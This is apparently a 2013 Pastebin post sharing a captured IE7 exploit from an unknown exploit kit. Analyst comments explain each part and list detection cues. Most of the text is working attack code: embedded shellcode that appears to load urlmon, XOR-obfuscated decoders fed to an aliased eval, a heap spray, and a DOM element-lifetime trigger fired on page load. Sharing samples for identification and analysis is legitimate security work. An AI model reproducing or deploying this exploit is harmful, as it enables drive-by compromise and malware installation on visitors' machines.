malwageddon

Unknown EK / IE7 Exploit

Sep 28th, 2013
  1. // The exploit code for IE7 included in Unknown EK captured on 2013-09-27
  2. // I'd appreciate any help in trying to identify it
  3. // I can be contacted @malwageddon or malwageddon@gmail.com
  4.  
    // Global holder for the sprayed strings. heapspray() fills it and also
    // returns it; keeping the array global presumably keeps the blocks
    // referenced (and so allocated) after the call returns — confirm.
    var memory = new Array();
  6.  
  7.    
// Decodes one obfuscated 32-bit integer into two UTF-16 code units.
// LMJPUcmSVSKUoQ: the encoded value; mBTWcbyaftSRdi: one-byte XOR key
// (the only caller on this page passes 172 = 0xac).
// Each of the four big-endian bytes of the value is XORed with the key and
// re-assembled as '%uXXXX' escapes, low 16 bits first, then decoded with
// unescape(). Used by heapspray() to rebuild the stub placed before scode.
// Detection note: arrays of 32-bit integers pushed through a per-byte XOR into
// '%u' escapes are a recurring way of hiding a shellcode/stub string from
// static scanners; the decode key (0xac) and array shape are reusable cues.
function sUgpRBKK(LMJPUcmSVSKUoQ, mBTWcbyaftSRdi)
{
      // zero-pad the hex form to 8 digits (4 bytes, most significant first)
      var BYFFSYbjYKDJvd = LMJPUcmSVSKUoQ.toString(16);
      BYFFSYbjYKDJvd = '00000000'.substring(0, 8 - BYFFSYbjYKDJvd.length) + BYFFSYbjYKDJvd;
     
      // byte 0 ^ key, zero-padded back to 2 hex digits
      var JTNgIQpUjetutQ = (parseInt(BYFFSYbjYKDJvd.substring(0, 2), 16) ^ mBTWcbyaftSRdi).toString(16);
      var kFRPcenzcaKnct = '00'.substring(0, 2 - JTNgIQpUjetutQ.length) + JTNgIQpUjetutQ;
      // byte 1 ^ key
      JTNgIQpUjetutQ = (parseInt(BYFFSYbjYKDJvd.substring(2, 4), 16) ^ mBTWcbyaftSRdi).toString(16);
      kFRPcenzcaKnct = kFRPcenzcaKnct + '00'.substring(0, 2 - JTNgIQpUjetutQ.length) + JTNgIQpUjetutQ;
      // byte 2 ^ key
      JTNgIQpUjetutQ = (parseInt(BYFFSYbjYKDJvd.substring(4, 6), 16) ^ mBTWcbyaftSRdi).toString(16);
      kFRPcenzcaKnct = kFRPcenzcaKnct + '00'.substring(0, 2 - JTNgIQpUjetutQ.length) + JTNgIQpUjetutQ;
      // byte 3 ^ key
      JTNgIQpUjetutQ = (parseInt(BYFFSYbjYKDJvd.substring(6, 8), 16) ^ mBTWcbyaftSRdi).toString(16);
      kFRPcenzcaKnct = kFRPcenzcaKnct + '00'.substring(0, 2 - JTNgIQpUjetutQ.length) + JTNgIQpUjetutQ;
 
    // emit the low word before the high word (little-endian dword order)
    return unescape('%u' + kFRPcenzcaKnct.substring(4, 8) + '%u' + kFRPcenzcaKnct.substring(0, 4));
}
  24.    
    // Builds the heap spray. One "slide" is assembled from a decoded stub
    // (MJpdWCGh), the shellcode in scode and optional NUL padding, grown to
    // about one 0x400000-byte block by str_concate(), then copied into
    // enough slots of the global `memory` array to reach heapSprayToAddress.
    // Returns `memory`. Relies on sUgpRBKK() and str_concate() from this file
    // and assigns the implicit globals `n` and `heapBlocks` (no `var`).
    function heapspray()
    {
        // Shellcode as UTF-16 escapes: each \uXXXX is one 16-bit word of
        // machine code (presumably x86). Not disassembled here.
        var scode = "\uc033\u70eb\u5655\uc033\uf83b\ud78b\u1175\u33fc\u64c0\u408b\u8b30\u0c40\u708b\uad1c\u508b\u5708\u428b\u8b3c\u0244\u0378\u50c2\u408b\u0320\u33c2\u41c9\u348b\u0388\u33f2\u50ff\uc033\ucfc1\uac13\uf803\uc085\u7558\u3bf2\u75fb\u58e6\u588b\u0324\u66da\u0c8b\u8b4b\u1c58\uc38b\uc203\u048b\u0388\u5fc2\u5d5e\ue0ff\u6a50\ubb40\u7a36\ud8eb\u91e8\uffff\uc3ff\udb33\u6853\u642e\u6c6c\u6568\u336c\u6832\u656b\u6e72\udc8b\u11b8\u0101\u2d01\u0101\u0101\u3350\u50c0\ubb53\uc49f\ua803\uff33\u61e8\uffff\u8bff\u33f8\ub8c0\u0301\u0101\u012d\u0101\u5001\uafe8\uffff\u5bff\u5050\ubb53\u4179\u88e7\u3fe8\uffff\u5aff\u5257\u3350\u53db\u6db8\u016d\u2d01\u0101\u0101\u6850\u6e6f\u642e\u7568\u6c72\u8b6d\ub8dc\u0111\u0101\u012d\u0101\u5001\uc033\u5350\u9fbb\u03c4\u33a8\ue8ff\uff06\uffff\uf88b\u11b8\u0101\u2d01\u0101\u0101\ue003\u5a58\uc203\u55b9\u716e\u8173\u01e9\u0101\u8901\u4008\u4040\ub940\u7770\u656a\ue981\u0101\u0101\u0889\u4040\u4040\u66b9\u2f73\u8165\u01e9\u0101\u8901\u4008\u4040\ub940\u6d6d\u0101\ue981\u0101\u0101\u0889\u4040\u4040\uc933\u0889\uca8b\u01b8\u0101\u2d01\u0101\u0101\ub850\u673e\u656f\u012d\u0101\u5001\u40b8\u7865\u2d6d\u0101\u0101\ub850\u712f\u7169\u012d\u0101\u5001\u66b8\u336f\u2d6a\u0101\u0101\ub850\u6a30\u656f\u012d\u0101\u5001\u30b8\u626f\u2d77\u0101\u0101\ub850\u6a30\u686e\u012d\u0101\u5001\u67b8\u6673\u2d68\u0101\u0101\ub850\u6e70\u7430\u012d\u0101\u5001\u76b8\u2f79\u2d64\u0101\u0101\ub850\u6666\u666d\u012d\u0101\u5001\u3bb8\u3030\u2d6c\u0101\u0101\ub850\u7569\u7175\u012d\u0101\u5001\udc8b\u3351\u50c0\u5150\u5053\u7dbb\u18c0\ue883\ufdfc\uffff\ub859\u0139\u0101\u012d\u0101\u0301\u5fe0\ub851\u0107\u0101\u012d\u0101\u5001\ubb51\ued82\u34b7\ud7e8\ufffd\u59ff\u11b8\u0101\u2d01\u0101\u0101\u3350\u50c0\ubb51\uc49f\ua803\ubde8\ufffd\ub8ff\u0111\u0101\u012d\u0101\u0301\u90e0";
 
        // Do not modify this part
 
        // fixed prologue and epilogue words wrapped around the payload
        scode = "\uec89\u9055" + scode
        scode += "\uc033\uc948\u90c9\uc9c9\ubec9\u0D18\u1624\u90c3"
 
        // each sprayed string is sized for one 0x400000-byte block; blocks are
        // allocated until the spray is expected to reach 0x14000000
        var heapBlockSize = 0x400000;
        var spraySlideSize = heapBlockSize
        var heapSprayToAddress = 0x14000000;
       
        var l = scode.length;
       
        // padding budget in '%u' escapes; implicit global (no `var`). With the
        // scode string shown above (well over 384 code units) this appears to
        // be negative, in which case the loop below never runs and `fill`
        // stays empty — confirm by evaluating scode.length.
        n = 4*256 -2*128 -2*l;
       
    var ssym = "%u";
       
        var fill = "";
    var j = 0;
    var b = 0;
        // append n/2 copies of '%u0000' (b is never changed, so a is "0");
        // unescape(fill) below turns them into NUL code units
        while (j<n/2) {
        var a = b.toString();
            fill = fill + ssym + a+a+a+a;          //fill string with u%0000 to respect alignment
        j++;
        }
       
    var asd = "";
   
// 64 encoded dwords; decoded with key 0xac through sUgpRBKK() into the stub
// that precedes the shellcode (each entry yields two UTF-16 code units).
// VDiTHUMo is an implicit global; mjhBrAxP/KynJjjwV are reused by name in
// str_concate() as well.
var MJpdWCGh = [3974950124, 3991793133, 4008636142, 4025479151, 3907578088, 3924421097, 3941264106, 3958107115, 3840206052, 3857049061, 3873892070, 3890735079, 3772834016, 3789677025, 3806520034, 3823363043, 4244438268, 4261281277, 4278124286, 4294967295, 4177066232, 4193909241, 4210752250, 4227595259, 4109694196, 4126537205, 4143380214, 4160223223, 4042322160, 4059165169, 4076008178, 4092851187, 3435973836, 3452816845, 3469659854, 3486502863, 3368601800, 3385444809, 3402287818, 3419130827, 3129516424, 3318072773, 3334915782, 3351758791, 3233857728, 3250700737, 3267543746, 3284386755, 3705461980, 3722304989, 3739147998, 3755991007, 3638089944, 3654932953, 3671775962, 3688618971, 3570717908, 3587560917, 3604403926, 3621246935, 3503345872, 3520188881, 2896997549, 3553874899];
var mjhBrAxP = '';
for(VDiTHUMo = 0; VDiTHUMo < MJpdWCGh.length; VDiTHUMo++)
{
    var KynJjjwV = '';
    KynJjjwV = sUgpRBKK(MJpdWCGh[VDiTHUMo], 172);
    mjhBrAxP += KynJjjwV;
}
 
    asd = mjhBrAxP;
   
        // one slide = decoded stub + shellcode + padding
        var spraySlide = asd + scode + unescape(fill);
 
        // (0x14000000 - 0x400000) / 0x400000 = 79 blocks; implicit global
        heapBlocks = (heapSprayToAddress - 0x400000)/heapBlockSize;
 
        // str_concate() grows the slide to roughly spraySlideSize bytes by
        // evaluating a decoded snippet (see that function)
        memory[0] = str_concate(spraySlideSize, spraySlide);
        var i = 1;
        // substring(0, length) rather than plain assignment — presumably to
        // force a separate copy of the string per slot instead of a shared
        // reference; engine-dependent, confirm before relying on it
        while (i <  heapBlocks)
        {
            memory[i] = memory[0].substring(0,memory[0].length);
            i++;
        }
        return memory;
    }
  79.        
    // Thin wrapper over str_concate() with the argument order swapped.
    // Not referenced anywhere else in this paste; heapspray() calls
    // str_concate() directly.
    function getSpraySlide(spraySlide, spraySlideSize)
    {
        return str_concate(spraySlideSize, spraySlide);
    }
  84.    
    // Pre-create 0x2000 (8192) <param> elements at load time; spray() later
    // assigns their .value. Requires a DOM (`document`). `i` is an implicit
    // global here and in spray(); heapspray() declares its own local `i`.
    var a = new Array();
    for (i=0; i<0x2000; i++)
    {
        a[i] = document.createElement("param");
    }
    // Assigns the same attribute string to every pre-created <param>. The
    // value starts with two non-ASCII code units (\u0024\u1624) followed by a
    // repeating "AABBBB" pattern. Detection cue: thousands of identical,
    // script-assigned attribute values on <param> elements that were never
    // inserted into the document.
    function spray()
    {
        for (i=0; i<0x2000; i++)
        {
            a[i].value = "\u0024\u1624AABBBBAAAABBBBAAAABBBBAAAABBBBAAAABBBBAAAABBBBAAAABB"
        }
    }
    // Entry point, started by the setTimeout() at the bottom of the file.
    // DOM sequence: build <input type='image'> inside a <fieldset>, attach it
    // to form1 with the IE-only applyElement(), clear form1, drop the input
    // reference, run spray() and heapspray(), then re-parse the body via
    // innerHTML. The create/detach/clear-then-spray ordering looks like a DOM
    // object-lifetime (use-after-free style) trigger, but the specific
    // vulnerability is not identified on this page — the paste author is
    // asking for exactly that.
    function asdasd()
    {
    var f = "form1";
        var form1 = document.getElementById(f);
    var im = "image";
        // createElement() with a markup string is an IE-only form
        var input = document.createElement("<input type='" + im + "'>")
    var fields = "fieldset";
        var fieldset = document.createElement(fields)
        fieldset.appendChild(input);
        // IE-only; in its default mode it reparents so that form1 presumably
        // ends up as the parent of fieldset — confirm against IE7 semantics
        fieldset.applyElement(form1);
        // detaches whatever is now inside form1 (fieldset and the input)
        form1.innerHTML = "";
        input = null;
        spray();
        heapspray();
        // closing tag is split, presumably so the literal "</iframe>" does
        // not appear in the script source
        document.body.innerHTML += "<iframe src='about:blank'></ifra" + "me>"
    }
  113.  
  114.    
// Decodes one obfuscated 32-bit integer into four single-byte characters.
// jUmKlPBy: the encoded value; PAYGYXdz: one-byte XOR key (the only caller
// passes 172 = 0xac). Same per-byte XOR as sUgpRBKK(), but each byte is
// emitted as its own '%u00XX' escape, least significant byte first, so the
// result is a plain 8-bit string. str_concate() uses it to rebuild the
// JavaScript snippet it evaluates.
function OjvEgxap(jUmKlPBy, PAYGYXdz)
{
      // zero-pad the hex form to 8 digits (4 bytes, most significant first)
      var AKqLndog = jUmKlPBy.toString(16);
      AKqLndog = '00000000'.substring(0, 8 - AKqLndog.length) + AKqLndog;
     
      // byte 0 ^ key, zero-padded back to 2 hex digits
      var QbwOYreu = (parseInt(AKqLndog.substring(0, 2), 16) ^ PAYGYXdz).toString(16);
      var hjMmnhoL = '00'.substring(0, 2 - QbwOYreu.length) + QbwOYreu;
      // byte 1 ^ key
      QbwOYreu = (parseInt(AKqLndog.substring(2, 4), 16) ^ PAYGYXdz).toString(16);
      hjMmnhoL = hjMmnhoL + '00'.substring(0, 2 - QbwOYreu.length) + QbwOYreu;
      // byte 2 ^ key
      QbwOYreu = (parseInt(AKqLndog.substring(4, 6), 16) ^ PAYGYXdz).toString(16);
      hjMmnhoL = hjMmnhoL + '00'.substring(0, 2 - QbwOYreu.length) + QbwOYreu;
      // byte 3 ^ key
      QbwOYreu = (parseInt(AKqLndog.substring(6, 8), 16) ^ PAYGYXdz).toString(16);
      hjMmnhoL = hjMmnhoL + '00'.substring(0, 2 - QbwOYreu.length) + QbwOYreu;
 
    // one character per byte, in little-endian byte order
    return unescape('%u00' + hjMmnhoL.substring(6, 8) + '%u00' + hjMmnhoL.substring(4, 6) + '%u00' + hjMmnhoL.substring(2, 4) + '%u00' + hjMmnhoL.substring(0, 2));
}
  131.    
// Grows `str` to roughly `val` bytes. The code that does the growing is not
// present in clear text: owLcqHrQ is decoded (key 0xac, OjvEgxap()) into a
// short JavaScript snippet that is run through window["eval"]; the snippet
// presumably refers to the `val` and `str` parameters. The decoded snippet is
// deliberately not reproduced in these notes.
// Detection cues: a string-literal "eval" looked up on `window` (hides the
// literal `eval(` token), and an eval'd string built from an XOR-decoded
// integer array.
function str_concate(val, str)
{
  // unused; the literal 172 (0xac) is passed to OjvEgxap() instead
  var sONNxwxA = 0xac;
 
  var auCYJaZh = "eval";
 
// 10 encoded dwords -> 40 characters; only the first 33 are evaluated below.
// VDiTHUMo is an implicit global (no `var`).
var owLcqHrQ = [3234186459, 3638527177, 3384836830, 3302542274, 3666910854, 2357575885, 2279528671, 3738754961, 903732375, 2432266531];
var mjhBrAxP = '';
for(VDiTHUMo = 0; VDiTHUMo < owLcqHrQ.length; VDiTHUMo++)
{
    var KynJjjwV = '';
    KynJjjwV = OjvEgxap(owLcqHrQ[VDiTHUMo], 172);
    mjhBrAxP += KynJjjwV;
}
 
 
  var evl = window[auCYJaZh];
  var cyc = mjhBrAxP.substring(0, 33);
 
  // NOTE(review): in ES5+ engines calling an aliased eval is an *indirect*
  // eval that runs in global scope, where `val`/`str` are not visible. This
  // sample targets IE7's JScript, which presumably still resolved the
  // caller's locals here — confirm before reasoning about it in a modern
  // engine (it will likely just throw a ReferenceError there).
  var res = evl(cyc);
 
  // keep val/2 - 0x1000 UTF-16 units, i.e. 0x2000 bytes short of `val`,
  // presumably to leave room for string/heap headers inside the block
  res = res.substring(0,val/2 - 0x1000);
  return res;
}
  156.  
  157. <form id="form1"></form>
  158.  
    // Kicks off asdasd() 1 ms after the script runs. The string form of
    // setTimeout is evaluated like eval(); another static-analysis cue.
    setTimeout("asdasd();",1);